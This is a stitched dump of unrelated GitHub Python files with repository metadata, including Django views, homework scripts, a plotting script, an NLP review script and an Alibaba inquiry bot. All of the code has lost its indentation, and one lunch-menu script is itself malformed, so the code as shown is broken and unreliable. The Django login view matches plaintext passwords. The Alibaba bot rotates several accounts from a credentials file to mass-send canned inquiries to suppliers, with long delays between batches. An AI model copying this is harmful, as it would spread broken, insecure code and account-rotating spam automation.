os.chdir(args.resources_dir)
for phase in os.listdir('.'):
if not phase.startswith('phase_'):
continue
if not os.path.isdir(phase):
continue
filename = phase + '.mf'
print('Writing...', filename)
filepath = os.path.join(dest, filename)
os.system('multify -c -f "%s" "%s"' % (filepath, phase))
print('Done preparing the client.')
| [
"nathanielfuhr@gmail.com"
] | nathanielfuhr@gmail.com |
77c2182969c900ebd6dd341a5877ea6b0d7bda9c | f2f67ddfca321dd9eb6480cfe4765d3a7d241371 | /tarea7Completa.py | a51e5db9f67df0aac54ae11558ad0ab209884f90 | [] | no_license | DianaAguilarMtz/Tarea_07 | 1e1c08b42e8a25a136977b6f0583646f39c24457 | f6f74e883f268aad44844230b647b92bb4706a19 | refs/heads/master | 2021-04-06T01:54:49.987647 | 2018-03-14T22:54:24 | 2018-03-14T22:54:24 | 125,282,612 | 0 | 0 | null | 2018-03-14T22:38:52 | 2018-03-14T22:38:52 | null | UTF-8 | Python | false | false | 2,128 | py | # Autor: Diana Aguilar Mtz
# Descripcion:
#funcion 1: hace divisiones y te muestra el residuo.
def probarDivisores():
print(" ")
print("Bienvenido al programa de divisores")
divisor = int(input("Divisor: "))
dividendo = int(input("Dividendo: "))
resultado = dividendo // divisor #cociente
modulo = dividendo % divisor #residuo
print(dividendo, "/", divisor, "=", resultado, ", sobra: ", modulo)
# funcion 2: te muestra el numero mayor que hayas ingresado, sin saber cuando vas a parar.
def determinarMayor():
print(" ")
print("Bienvenido al programa que encuentra el mayor")
n = int(input("Teclee un número [-1 para salir]: "))
numeroMayor = 0 #valor inicial
if n ==-1: #opcion para salir cuando no han metido ningun numero.
print("No hay numero mayor")
elif n != -1: #opcion para comparar numeros.
while n != -1:
n = int(input("Teclee un número [-1 para salir]: "))
if n > numeroMayor:
numeroMayor = n
print("el numero mayor es: ", numeroMayor)
def main():
print("""Tarea 7: Ciclos While
Autor: Diana Aguilar Mtz.
1: Imprimir divisores
2: Encontrar el mayor
3: Salir """)
opcion = int(input("Teclea tu opción: ")) #el ususario decide que desea hacer.
while opcion >0: #while principal mostrar menú.
if opcion == 1:
probarDivisores()# funcion 1.
elif opcion == 2:
determinarMayor()#funcion 2.
elif opcion == 3: #funcion para sair del programa.
break
else:
print("ERROR, teclea 1, 2 o 3") #mensaje que aparece cuando seleccionas un numero mayor a 3.
print("""
Tarea 7: Ciclos While
Autor: Diana Aguilar Mtz.
1: Imprimir divisores
2: Encontrar el mayor
3: Salir """)
opcion = int(input("Teclea tu opción: "))
print(" ")
print("Gracias por usar este programa, vuelve pronto") #mensaje de despedida
main()
| [
"noreply@github.com"
] | DianaAguilarMtz.noreply@github.com |
d1433640b2aaccd380003e310321de06c7b8b95c | cec7e0f0f7ada1e662d8bc7221e951f5215d34f8 | /django_auth/views.py | 30ba2449edb5f1086ced65e36fb5e3d735615f73 | [] | no_license | Wanke15/django_auth | d92a2f63da64a3c053780e6efe0e005964d58e0d | 5941f5fd3e8f4b6e2b763e1281db814d721c6dc9 | refs/heads/main | 2023-02-19T00:34:51.199410 | 2021-01-12T15:39:10 | 2021-01-12T15:39:10 | 329,030,416 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 474 | py | from django.shortcuts import render, redirect
from search.models import User
def login(request):
if request.method == "GET":
return render(request, 'login.html')
if request.method == "POST":
username = request.POST.get('username', "")
password = request.POST.get('password', "")
if User.objects.filter(username=username, password=password):
request.session["username"] = username
return redirect("/index/")
| [
"1015005300@qq.com"
] | 1015005300@qq.com |
a5a0f83dda23889e95f693472e9a4e3bb2c874a0 | 79542b110ca0443f6a180f6f906a15f049485962 | /django-leaning/ch07/mysite/polls/views.py | f02e8ddc2bfd8445c45a16f104264e517a799592 | [] | no_license | devuser/spark-notes | 9e1c207f052eed43fae2a436f63a6ac0bad0d83b | 4429e08f66fc4dcf7502314995559c1de0d07ec6 | refs/heads/master | 2021-05-16T03:03:59.665992 | 2017-09-29T05:31:13 | 2017-09-29T05:31:13 | 42,443,800 | 20 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,046 | py | from django.shortcuts import get_object_or_404, render
from .models import Question
from django.http import Http404
from django.http import HttpResponseRedirect, HttpResponse
from django.urls import reverse
from django.utils import timezone
from .models import Choice, Question
from django.shortcuts import get_object_or_404, render
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.views import generic
from .models import Choice, Question
class IndexView(generic.ListView):
template_name = 'polls/index.html'
context_object_name = 'latest_question_list'
def get_queryset(self):
"""
Return the last five published questions (not including those set to be
published in the future).
"""
return Question.objects.filter(
pub_date__lte=timezone.now()
).order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
def get_queryset(self):
"""
Excludes any questions that aren't published yet.
"""
return Question.objects.filter(pub_date__lte=timezone.now())
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def vote(request, question_id):
question = get_object_or_404(Question, pk=question_id)
try:
selected_choice = question.choice_set.get(pk=request.POST['choice'])
except (KeyError, Choice.DoesNotExist):
# Redisplay the question voting form.
return render(request, 'polls/detail.html', {
'question': question,
'error_message': "You didn't select a choice.",
})
else:
selected_choice.votes += 1
selected_choice.save()
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))
| [
"pythoner@icloud.com"
] | pythoner@icloud.com |
958cf3f290b54cc90305a031368d936cc73d933f | 146bca615b0061501ca7d4c021f592cea4820548 | /django/sample/polls/migrations/0002_auto_20170717_0920.py | 59ced813683c1b84b2ecc38eae050a94dfb5816c | [
"MIT"
] | permissive | jyodroid/python_training | abb9485bb185f9ddfd663440b94a96a0a57d470a | 7b17145faed6a005d44a08c2f72a60644705f1e1 | refs/heads/master | 2020-06-14T20:28:23.211739 | 2017-09-14T16:52:36 | 2017-09-14T16:52:36 | 75,350,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-17 14:20
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('polls', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='question',
old_name='questio_text',
new_name='question_text',
),
]
| [
"jtangarife@isf.com.co"
] | jtangarife@isf.com.co |
97cd0d9b095f822538a9db1a5b6aaa38fceb77f8 | a81b4ff2029f9e1ae0a9ff864c78a57622a49779 | /allgraphs-russian.py | 2f4816e085b139c3f401179ef47156189d2ff060 | [] | no_license | EArwa/LVfeederDERsimulation | 7b33ecbe0a3ca1db53bde2669088d219d4170821 | c04bfbd44071279a4d4f106282a8cde0877faa6f | refs/heads/master | 2023-04-18T07:21:02.468933 | 2021-05-04T18:35:25 | 2021-05-04T18:35:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,101 | py | import os
import pandas as pd
import matplotlib.pyplot as plt
pv_ev_bat_data = pd.read_csv("data/results/PV_EV_battery/04-graph-data/graph-data.csv",
sep=",", decimal=".")
pv_bat_data = pd.read_csv("data/results/PV_battery/04-graph-data/graph-data.csv",
sep=",", decimal=".")
ev_bat_data = pd.read_csv("data/results/EV_battery/04-graph-data/graph-data.csv",
sep=",", decimal=".")
pv_ev_bat_data.index = pv_ev_bat_data.index.astype(int)
pv_ev_bat_data.sort_index()
pv_bat_data.index = pv_bat_data.index.astype(int)
pv_bat_data.sort_index()
ev_bat_data.index = ev_bat_data.index.astype(int)
ev_bat_data.sort_index()
colors = {
0: 'red',
25: 'blue',
50: 'yellow',
75: 'orange',
100: 'green'
}
cooperation_labels = {
0: '0% коллективной оптимизации',
25: '25% коллективной оптимизации',
50: '50% коллективной оптимизации',
75: '75% коллективной оптимизации',
100: '100% коллективной оптимизации'
}
def plot_results(data, ycolumn, xlabel, ylabel, title, filename):
fig, ax = plt.subplots()
for cooperationPercent in range(0, 101, 25):
singleDataFrame = data.loc[data['cooperation_percent']
== cooperationPercent]
ax.scatter('installations_percent', ycolumn, data=singleDataFrame,
color=colors[cooperationPercent], linewidth=2, label=cooperation_labels[cooperationPercent])
plt.grid()
plt.legend(loc="upper left")
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.title(title)
dir_path = "graphs/scatter-plots/ru"
file_path = "{}/{}".format(dir_path, filename)
os.makedirs(
dir_path, exist_ok=True)
plt.savefig(file_path)
def main():
plot_results(
pv_ev_bat_data, 'voltage_factor', 'Уровень распределенных энергоресурсов [%]', 'Ku', 'Ku, на шине потребителя', 'PV_EV_battery Ku на шине потребителя.png')
plot_results(pv_bat_data, 'voltage_factor', 'Уровень распределенных энергоресурсов [%]', 'Ku',
'Ku, на шинах потребителя', 'PV_battery Ku на шине потребителя.png')
plot_results(ev_bat_data, 'voltage_factor', 'Уровень распределенных энергоресурсов [%]', 'Ku',
'Ku, на шинах потребителя', 'EV_battery Ku на шине потребителя.png')
plot_results(
pv_ev_bat_data, 'lv_voltage_factor', 'Уровень распределенных энергоресурсов [%]', 'Ku', 'Ku, на шине НН трансформатора', 'PV_EV_battery Ku на шине НН трансформатора.png')
plot_results(pv_bat_data, 'lv_voltage_factor', 'Уровень распределенных энергоресурсов [%]', 'Ku',
'Ku, на шине НН трансформатора', 'PV_battery Ku на шине НН трансформатора.png')
plot_results(ev_bat_data, 'lv_voltage_factor', 'Уровень распределенных энергоресурсов [%]', 'Ku',
'Ku, на шине НН трансформатора', 'EV_battery Ku на шине НН трансформатора.png')
plot_results(
pv_ev_bat_data, 'load_factor', 'Уровень распределенных энергоресурсов [%]', 'Kp', 'Kp, на шине потребителя', 'PV_EV_battery Kp на шине потребителя.png')
plot_results(pv_bat_data, 'load_factor', 'Уровень распределенных энергоресурсов [%]', 'Kp',
'Kp, на шине потребителя', 'PV_battery Kp на шине потребителя.png')
plot_results(ev_bat_data, 'load_factor', 'Уровень распределенных энергоресурсов [%]', 'Kp',
'Kp, на шине потребителя', 'EV_battery Kp на шине потребителя.png')
plot_results(
pv_ev_bat_data, 'lv_load_factor', 'Уровень распределенных энергоресурсов [%]', 'Kp', 'Kp, на шине НН трансформатора', 'PV_EV_battery Kp на шине НН трансформатора.png')
plot_results(pv_bat_data, 'lv_load_factor', 'Уровень распределенных энергоресурсов [%]', 'Kp',
'Kp, на шине НН трансформатора', 'PV_battery Kp на шине НН трансформатора.png')
plot_results(ev_bat_data, 'lv_load_factor', 'Уровень распределенных энергоресурсов [%]', 'Kp',
'Kp, на шине НН трансформатора', 'EV_battery Kp на шине НН трансформатора.png')
if __name__ == "__main__":
main()
| [
"ellina.shurovsk@gmail.com"
] | ellina.shurovsk@gmail.com |
961bd3a9c5a9c94b6844fd35f9644acc5f43a6f4 | 102b692e41a2fe9880244aa29f9369c08f3260ca | /week_lunch.py | db855f008fe8970764593e0a548848b5dc0eb9ef | [] | no_license | Mamata720/if-else | 25cf74b71057067df973023dba4f0d70c5b9a89f | 1a766a10e00f6303ff8dc7c48b5f386161bd7caa | refs/heads/main | 2023-06-19T02:21:57.159225 | 2021-07-19T18:12:04 | 2021-07-19T18:12:04 | 386,961,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 789 | py | day=input("enter the day")
if day=="sunday":
print("poha")
if day=="munday":
print("khichidi")
if day=="thusday":
print("dal chavl")
if day==wedenesday:
print("sabji roti")
if day=="thursday":
print("kheer")
if day=="friday":
print("poha")
if day==seterday:
print("edli")
else:
print("no")
else:
print("no")
else:
print("no")
else:
print("no")
else:
print("no")
else:
print("no")
else:
print("no") | [
"noreply@github.com"
] | Mamata720.noreply@github.com |
02b0333d499f2b4da71514ad0918390d9f4ad32c | fb35e41ab2cc3ea65f7cdf72a3ef8b0ed9f19071 | /shop/context_processors.py | e5763a344f748ea34e86057e08439fe2ffeb9e4d | [
"MIT"
] | permissive | euanrussano/tinyshop | 61cf45e722e369fe6c9579136515f00782791718 | 263280258e55351c833064889ee847ce137dd4d3 | refs/heads/master | 2023-05-31T08:20:56.006628 | 2021-06-12T01:11:44 | 2021-06-12T01:11:44 | 376,150,008 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 642 | py | from django.conf import settings # import the settings file
def website_info(request):
# return the value you want as a dictionnary. you may add multiple values in there.
return {
'WEBSITE_NAME': settings.WEBSITE_NAME,
'PHONE_NUMBER': settings.PHONE_NUMBER,
'EMAIL': settings.EMAIL,
'ADDRESS': settings.ADDRESS,
'FACEBOOK': settings.FACEBOOK,
'LINKEDIN': settings.LINKEDIN,
'TWITTER': settings.TWITTER,
'RSS': settings.RSS,
'PINTEREST': settings.PINTEREST,
'WHATSAPP': settings.WHATSAPP,
} | [
"euanrussano@gmail.com"
] | euanrussano@gmail.com |
533e268693eea62c5bb3f69ab76a803526a65160 | ba5a6f1b6776c3503a4e6f486795ffd62a11810b | /Loja/estoque/serializers.py | 6776b5b59e391210ae635f5792ccc069004d7f4b | [] | no_license | AmaroCesa/intmed_test | 9e4e78a0dc7eb989b797ca9b5c56d94588d08193 | 1e59a365298ad33216aad5635b6df3fe98749c7c | refs/heads/master | 2021-06-13T06:44:29.943526 | 2019-05-27T02:08:47 | 2019-05-27T02:08:47 | 155,141,625 | 0 | 0 | null | 2021-06-10T20:56:24 | 2018-10-29T02:44:41 | JavaScript | UTF-8 | Python | false | false | 202 | py | from rest_framework import serializers
from .models import Estoque
class EstoqueSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Estoque
fields = ('__all__')
| [
"amaro.txt@gmail.com"
] | amaro.txt@gmail.com |
f5397c8cf5a875624c2bbafbf473044f93f85d2a | 2d0acf215e4863273075053712ff7df94775153a | /script/Main.py | 83dc303b008fba809742a9b21cefb599e2542080 | [
"MIT"
] | permissive | iOSToolsOS/json2model | 712cc187e4d057d7483088c16d0d32b930d322ef | 1b17d6b2850bf48ec93e040683ac04c36f2a7be0 | refs/heads/master | 2020-04-15T01:16:10.520583 | 2019-02-01T03:28:27 | 2019-02-01T03:28:27 | 164,269,199 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | import JsonParser
import json
with open("jsons.txt","r") as f:
result = JsonParser.parse(f.read(), "Result")
print(result)
with open("ResultModel.swift", "w") as w:
w.writelines([line+'\n' for line in result])
| [
"shmilyshijian@foxmail.com"
] | shmilyshijian@foxmail.com |
4fb49f5467ce56af7e2012a6a1eadbe036caa6e3 | 9b8399e283014f3394f7a55e6350e4744a96441b | /Alibaba Inquiry Sender.py | bdae985a770a16170dfdcca296444d149d67b88f | [] | no_license | asimejaz14/AliBaba-Scraper | 42fc9eb78a0157a60d219ac03cdbc8ed4ee51783 | f7718d75d9e430697df2f92cd258a96fea5dddc7 | refs/heads/main | 2023-01-10T01:14:57.563299 | 2020-11-14T10:56:18 | 2020-11-14T10:56:18 | 312,797,457 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,568 | py | import ctypes
import time
from bs4 import BeautifulSoup
from pyfiglet import Figlet
from selenium import webdriver
from selenium.common.exceptions import TimeoutException, NoSuchElementException, ElementClickInterceptedException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
f = Figlet(font='slant')
print(f.renderText('Alibaba Inquiry Sender'))
chrome_options = webdriver.ChromeOptions();
chrome_options.add_experimental_option("useAutomationExtension", False)
chrome_options.add_argument("--disable-extensions")
chrome_options.add_argument("--start-maximized")
chrome_options.add_argument("--incognito")
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_argument('--ignore-ssl-errors')
chrome_options.add_argument("user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)"
" Chrome/47.0.2526.111 Safari/537.36")
def countdown(t):
while t > 0:
# print("Moving to next supplier page in", t, " seconds")
t -= 1
time.sleep(1)
def get_supplier_urls(url_get):
driver.get(url_get)
# /html/body/div[1]/div[2]/div/div[1]/div/div[2]
select_option = WebDriverWait(driver, 60).until(
EC.presence_of_element_located(
(By.XPATH, '//html/body/div[1]/div[2]/div/div[1]/div/div[2]')))
# /html/body/div[1]/div[2]/div/div[1]/div/div[2]
html = select_option.get_attribute('innerHTML')
soup = BeautifulSoup(html, 'lxml')
supplier_urls = []
for item in soup.findAll("div", {"data-spm": "35"}):
# button csp
contact = item.find("a", {"class": "button csp"}, href=True)
contact_url = 'https:' + contact['href']
supplier_urls.append(contact_url)
return supplier_urls
try:
file_path = input("Input URL file: ")
file_path = file_path.strip('\"')
file_path = file_path.rstrip('\"')
except FileNotFoundError:
print("File not found")
exit()
msg = ''
with open('message.txt', encoding='utf-8') as file:
msg = file.read()
urls_to_capture = []
with open(file_path, encoding='utf-8') as file:
urls = file.readlines()
for url in urls:
url = url.rstrip('\n')
urls_to_capture.append(url)
with open('credentials.txt', encoding='utf-8') as file:
creds = file.readlines()
def login(username, password):
driver.get('https://passport.alibaba.com/icbu_login.htm')
# username
select_option = WebDriverWait(driver, 60).until(
EC.presence_of_element_located(
(By.XPATH, '//html/body/div[2]/div[2]/div[2]/div[1]/div/form/div[4]/dl[1]/dd/div/input')))
select_option.click()
select_option.send_keys(username)
# password
select_option = WebDriverWait(driver, 60).until(
EC.presence_of_element_located(
(By.XPATH, '//html/body/div[2]/div[2]/div[2]/div[1]/div/form/div[4]/dl[2]/dd/div/input')))
select_option.click()
select_option.send_keys(password)
try:
select_option = WebDriverWait(driver, 15).until(
EC.presence_of_element_located(
(By.XPATH, '//html/body/div[2]/div[2]/div[2]/div[1]/div/form/div[4]/dl[3]/dd[1]/div/div/div[1]/div[2]/span')))
ctypes.windll.user32.MessageBoxW(0, "Press ok and verify", "Login", 1)
time.sleep(15)
select_option = WebDriverWait(driver, 60).until(
EC.presence_of_element_located(
(By.XPATH, '//html/body/div[2]/div[2]/div[2]/div[1]/div/form/div[5]/input[2]')))
select_option.click()
except TimeoutException:
# time.sleep(15)
# login
select_option = WebDriverWait(driver, 60).until(
EC.presence_of_element_located((By.XPATH, '//html/body/div[2]/div[2]/div[2]/div[1]/div/form/div[5]/input[2]')))
select_option.click()
# verifying login
# select_option = WebDriverWait(driver, 60).until(
# EC.presence_of_element_located((By.XPATH, '//html/body/div[1]/header/div[2]/div[3]/div/div/form/div[2]')))
errors = []
with open('errors.txt', 'w', encoding='utf-8') as file:
counter1 = 0
for url in urls_to_capture:
# spliting username and password
if counter1 == len(creds):
counter1 = 0
cr_splited = creds[counter1].split(':')
counter1 += 1
username = cr_splited[0]
password = cr_splited[1]
password = password.rstrip('\n')
print("Logging in", username, password)
driver = webdriver.Chrome(options=chrome_options)
login(username, password)
time.sleep(5)
sup_urls = get_supplier_urls(url)
print(f"Sending inquiry to {len(sup_urls)} suppliers one by one")
counter = 0
for s_url in sup_urls:
counter += 1
try:
# if counter ==3:
# break
time.sleep(3)
driver.get(s_url)
select_option = WebDriverWait(driver, 60).until(
EC.presence_of_element_located(
(By.XPATH, '//html/body/div[2]/div/form/div[1]/div[4]/div/textarea')))
select_option.click()
select_option.send_keys(msg)
# /html/body/div[2]/div/div[2]/div/span
select_option = WebDriverWait(driver, 60).until(
EC.presence_of_element_located(
(By.XPATH, '//html/body/div[2]/div/form/div[1]/div[5]/div[3]/div[2]/input')))
select_option.click()
# print("URL:", counter)
# print(s_url)
print('Inquiry sent')
except TimeoutException:
print("INVALID", s_url)
errors.append(s_url)
except NoSuchElementException:
print("INVALID", s_url)
errors.append(s_url)
except ElementClickInterceptedException:
select_option = WebDriverWait(driver, 60).until(
EC.presence_of_element_located(
(By.XPATH, '//html/body/div[2]/div/div[2]/div/span')))
select_option.click()
select_option = WebDriverWait(driver, 60).until(
EC.presence_of_element_located(
(By.XPATH, '//html/body/div[2]/div/form/div[1]/div[4]/div/textarea')))
select_option.click()
select_option.send_keys(msg)
# /html/body/div[2]/div/div[2]/div/span
select_option = WebDriverWait(driver, 60).until(
EC.presence_of_element_located(
(By.XPATH, '//html/body/div[2]/div/form/div[1]/div[5]/div[3]/div[2]/input')))
select_option.click()
# print("URL:", counter)
# print(s_url)
print('Inquiry sent')
final_errors = set(errors)
for f in final_errors:
file.write(f)
file.write('\n')
driver.quit()
print()
print("Automated bot delay 25 mins")
print()
countdown(1500)
# login()
print("Press any key to exit...")
driver.quit()
# --add-data "venv\Lib\site-packages\pyfiglet;./pyfiglet" | [
"noreply@github.com"
] | asimejaz14.noreply@github.com |
baba91a7ec782d10e70f4645c4c4bc184b8c00af | c390fecca9aa1c4ddf4f3fd6cf202e7991992dab | /ContourPerlin.py | a13256c03be96cf4ec5df6970ced13dab8970e63 | [] | no_license | Codingmace/Island-Generator | 2411f13e76d914c17c6e188c7659839d9c83262e | 19be89e94474cfd7352e0916a50362733965d996 | refs/heads/master | 2022-02-14T21:29:52.486702 | 2019-08-18T21:24:58 | 2019-08-18T21:24:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,645 | py | import PIL, random, sys, argparse, math
from PIL import Image, ImageDraw
import noise
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--width", default=1500, type=int)
parser.add_argument("--height", default=1500, type=int)
parser.add_argument("-s", "--scale", default=200.0, type=float)
parser.add_argument("-o", "--octaves", default=6, type=int)
parser.add_argument("-p", "--persistence", default=.5, type=float)
parser.add_argument("-l", "--lacunarity", default=2.0, type=float)
parser.add_argument("-b", "--base", default=0, type=int)
parser.add_argument("-md", "--max_distance", default=900.0, type=float)
parser.add_argument("-a", "--alter", default=0, type=int)
args = parser.parse_args()
random.seed()
offset = random.randint(1, 100) * random.randint(1, 1000)
width, height = args.width, args.height
octaves = args.octaves
persistence = args.persistence
lacunarity = args.lacunarity
scale = args.scale
base = args.base
alter = args.alter
max_distance = args.max_distance
pil_image = Image.new('RGBA', (width, height))
pixels = pil_image.load()
for i in range(pil_image.size[0]):
for j in range(pil_image.size[1]):
# Generates a value from -1 to 1
pixel_value = noise.pnoise2((offset+i)/scale,
(offset+j)/scale,
octaves,
persistence,
lacunarity,
width,
height,
base)
distance_from_center = math.sqrt(math.pow((i - width/2), 2) + math.pow((j - height/2), 2))
gradient_perc = distance_from_center/max_distance
pixel_value -= math.pow(gradient_perc, 3)
if (int(pixel_value * 100.0) > 30 - alter):
pixels[i, j] = (240, 240, 240)
elif (int(pixel_value * 100.0) > 20 - alter):
pixels[i, j] = (200, 200, 200)
elif (int(pixel_value * 100.0) > 5 - alter):
pixels[i, j] = (134, 164, 114)
elif (int(pixel_value * 100.0) > 0 - alter):
pixels[i, j] = (236, 212, 184)
else:
pixels[i, j] = (153, 162, 157)
pil_image.save('Examples/Island-' + str(offset) + '-w-' + str(width) + '-h-' + str(height) + '.png')
if __name__ == "__main__":
main()
# 52 minutes - Definitely my maybe
# -> 1:07
# watch endsceen -> credits
| [
"erdavids@ncsu.edu"
] | erdavids@ncsu.edu |
88d0260a7a136e03170f9a8e165482b3bf44af38 | c5c32b63d6407136bc577b6b75b6bb9648bd11bc | /onboardingapp/team/migrations/0019_additionalinfo.py | 44d7e32fbccfe91638f017c087542d67a2dbef97 | [] | no_license | elston/onboardingapp | 33adf70459797a0ce28b6178d09496d91275487f | b99f338cbed62812c069bf2e7dba781aec4ad741 | refs/heads/master | 2021-01-21T20:53:07.294200 | 2017-04-10T09:09:01 | 2017-04-10T09:09:01 | 69,735,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,075 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-01 22:09
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('team', '0018_team_admin'),
]
operations = [
migrations.CreateModel(
name='AdditionalInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('data', models.CharField(blank=True, max_length=255)),
('service', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='service_info', to='team.Service')),
('team', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='team_info', to='team.Team')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='teamuser_info', to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"3977522@gmail.com"
] | 3977522@gmail.com |
de1019483b69941bd011ad7b7553ba4bb7c5128a | 2fcf03728f7aaee3f9f8de3dbdfdc35468e8b70a | /ReviewItems/Rew.py | 9a2b1b9f6f31ad120040dce7e8f13966c59e9f75 | [] | no_license | zolunga/PLN | 1a116242a2a085978d7ce0aa191bc147193c7e7f | 9efb5000d31e533285b9f9b5692c1184aba05628 | refs/heads/master | 2020-03-27T23:01:53.117689 | 2018-11-30T05:31:01 | 2018-11-30T05:31:01 | 147,283,097 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,446 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 19 16:28:35 2018
@author: Alan
"""
import nltk
import pickle
import re
import json
import operator
from bs4 import BeautifulSoup
from nltk import word_tokenize
from nltk.corpus import PlaintextCorpusReader
def getCorpusTokens(NameDoc, encode):
''' Obtiene los tokens del texto y elimina algunos caracteres'''
try:
f=open(NameDoc, encoding=encode)
t=f.read()
f.close()
except Exception as e:
return []
soup = BeautifulSoup(t, 'lxml')
tS = soup.get_text()
tS = tS.replace('\x97', ' ')
tS = tS.lower()
tokens = nltk.Text(nltk.word_tokenize(tS))
return tokens
def getCorpusSentences(NameDoc, encode):
''' Obtiene los tokens del texto y elimina algunos caracteres'''
try:
f=open(NameDoc, encoding=encode)
t=f.read()
f.close()
except Exception as e:
return []
soup = BeautifulSoup(t, 'lxml')
tS = soup.get_text()
tS = tS.replace('\x97', ' ')
tS = tS.lower()
tokens = nltk.Text(nltk.sent_tokenize(tS))
return tokens
def cleanTokens(vocabulario):
'''Solo limpia el vocabulario, usa una expresion regular para validar letra
por letra y evitar que se ingresen caracteres no deseados o deconocidos en el corpus'''
palabra_limpia = "";
Arr = []
for word in vocabulario:
palabra_limpia = ""
for letter in word:
if re.match(r'[a-záéíóúñ]', letter):
palabra_limpia += letter
if palabra_limpia != "" and "www" not in palabra_limpia and "http" not in palabra_limpia:
Arr.append(palabra_limpia)
return Arr
def deleteStopWords(vocabulario, sw):
new_v = []
for word in vocabulario:
if word not in sw:
new_v.append(word)
return new_v
def loadLemmaDict():
file = open('dictionary', 'rb')
dictionary = pickle.load(file)
file.close()
return dictionary
def getAllReviews():
TemporalName1 = ""
TemporalName2 = ""
Temporaltext = []
texts = {}
for i in range(0,6): #0, 6
for j in range (0, 30): #0, 30
TemporalName1 = "moviles/no_" + str(i) + "_" + str(j) + ".txt"
TemporalName2 = "moviles/yes_" + str(i) + "_" + str(j) + ".txt"
#Temporaltext = getCorpusTokens(TemporalName1, 'utf-8')
Temporaltext = getCorpusSentences(TemporalName1, 'utf-8')
if len(Temporaltext) > 0:
texts[TemporalName1[8:]] = Temporaltext
#Temporaltext = getCorpusTokens(TemporalName2, 'utf-8')
Temporaltext = getCorpusSentences(TemporalName2, 'utf-8')
if len(Temporaltext) > 0:
texts[TemporalName2[8:]] = Temporaltext
return texts
def lemmatizado(text, lemmas):
new_text = []
for word in text:
dictLetter = lemmas[word[0]]
for key in dictLetter:
for Terminacion in dictLetter[key]['Terminaciones']:
combinacion = key + "" + Terminacion
if combinacion == word:
new_text.append({'Palabra':dictLetter[key]['Palabra'],
'tipo': dictLetter[key]['Classificiacion']})
break
new_text.append({'Palabra': word,
'tipo': "sn"})
return new_text
def countNouns(texts):
dictCount = {}
for key in texts:
for element in texts[key]:
print(element)
if element['tipo'].startswith("nc"):
if element['Palabra'] in dictCount:
dictCount[ element['Palabra'] ] += 1
else:
dictCount[ element['Palabra'] ] = 1
return(dictCount)
def compute_ngrams(sequence, n):
return zip(*[ sequence[index:] for index in range(n)])
def getTopNgrams(corpus, ngram_val = 2, limit = 5):
tokens = corpus
ngrams = compute_ngrams(tokens, ngram_val)
ngrams_freq_dist = nltk.FreqDist(ngrams)
sorted_ngrams_fd = sorted(ngrams_freq_dist.items(), key =operator.itemgetter(1), reverse = True)
sorted_ngrams = sorted_ngrams_fd[0:limit]
sorted_ngrams = [(' '.join(text), freq) for text, freq in sorted_ngrams]
return sorted_ngrams
def getSentimentalDictionary():
dict1 = {}
doc = open('fullStrengthLexicon.txt', encoding='utf-8')
contents = doc.read()
contents = contents.split("\n")
for line in contents:
pala=line.split("\t")
dict1[pala[0]] = pala[len(pala)-1]
return dict1
sentimental_dict = getSentimentalDictionary()
textoSW = getCorpusTokens('stopwords_es.txt', 'utf-8')
textoReviews = getAllReviews()
lemmas = loadLemmaDict()
dictionaryCount = {}
file = open('Res1.txt','w')
for key in textoReviews:
print(key)
#print(getTopNgrams(textoReviews[key], 2, 5))
textoReviews[key] = cleanTokens(textoReviews[key])
textoReviews[key] = deleteStopWords(textoReviews[key], textoSW)
textoReviews[key] = lemmatizado(textoReviews[key], lemmas)
file.write(key)
file.write("-------------\n")
file.write(json.dumps(textoReviews[key]))
file.write("-------------\n\n\n\n\n\n\n\n\n\n\n\n")
last = countNouns(textoReviews)
last = sorted(last.items(), key=operator.itemgetter(1))
file.write("------------------------conteos----------------------------")
file.write(json.dumps(last))
file.close()
| [
"alangarcia3106@gmail.com"
] | alangarcia3106@gmail.com |
